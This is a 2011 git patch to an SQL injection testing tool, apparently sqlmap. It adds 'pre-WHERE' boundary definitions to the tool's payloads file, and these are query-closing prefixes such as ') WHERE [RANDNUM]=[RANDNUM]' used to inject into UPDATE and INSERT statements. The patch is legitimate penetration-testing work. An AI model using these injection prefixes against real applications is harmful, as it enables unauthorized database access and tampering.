From d283e3eb3c78e034c95a1d0e629204c9e964f24c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 24 Aug 2011 09:04:18 +0000
Subject: [PATCH] adding support for pre-WHERE injections

---
 xml/payloads.xml | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index db1075f67..5f2b0c4d9 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -449,6 +449,45 @@ Formats:
     <!-- End of WHERE/HAVING clause boundaries -->
 
 
+    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix></suffix>
+    </boundary>
+    <!-- End of generic boundaries -->
+
+
     <!-- Boolean-based blind tests - WHERE/HAVING clause -->
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause</title>